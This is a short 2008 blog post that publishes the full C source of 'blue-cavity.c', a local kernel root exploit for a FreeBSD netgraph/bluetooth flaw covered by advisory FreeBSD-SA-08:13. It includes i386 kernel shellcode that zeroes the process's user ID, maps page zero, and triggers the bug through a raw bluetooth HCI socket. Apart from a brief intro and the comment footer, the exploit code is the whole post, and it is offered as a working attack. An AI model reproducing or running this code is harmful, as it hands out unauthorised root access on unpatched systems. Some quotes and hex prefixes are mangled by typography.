tooth decay…
published: December 24, 2008
My first post to the blog is the exploit for a bluetooth/netgraph kernel vuln in FreeBSD… Disappointed? expected XSS? Go somewhere else… WEB 2.0 may be fashionable but it is certainly not for us…
The official FreeBSD advisory is here
http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc.
/* blue-cavity.c
*
* FreeBSD >= 5.x local kernel root exploit for netgraph sockets...
* by christer - Wed 29 Oct 2008
*
* - Tested on: FreeBSD 7.0 (x86)
*
* This particular exploit requires a configured bluetooth device.
* Look at src if you need to know why, if you don't have a bt dev
* on the target you may get lucky with other netgraph stuff
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.bsdcitizen.org/ -- BSDCITIZEN 2008!@$!
*
* BSDCITIZEN source code may NOT be used by penetration testers
* without written consent from BSDCITIZEN!!!
*
* christer [ at ] signedness.org / bsdcitizen.org
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <bluetooth.h>
#include <err.h>
/*
/ Kernel shellcode for i386.. don’t do anything stupid like
/ trying it on ADM64 kernels etc….
*/
static unsigned char shell[]=
“\x64\xa1\x00\x00\x00\x00\x8b\x40″
“\x04\x8b\x40\x30\xc7\x40\x04\x00″
“\x00\x00\x00\xc3″;
main()
{
int s;
if(mmap(0,0×1000,PROT_READ|PROT_WRITE,MAP_FIXED|MAP_ANON,-1,0)==
MAP_FAILED)
err(1,”mmap”);
memcpy((void *)0×0,shell,sizeof(shell));
s=socket(PF_BLUETOOTH,SOCK_RAW,BLUETOOTH_PROTO_HCI);
if(s<0)
err(1,”socket”);
shutdown(s,SHUT_WR);
return 0×1337;
}No Comments »
No comments yet.
RSS feed for comments on this post. TrackBack URL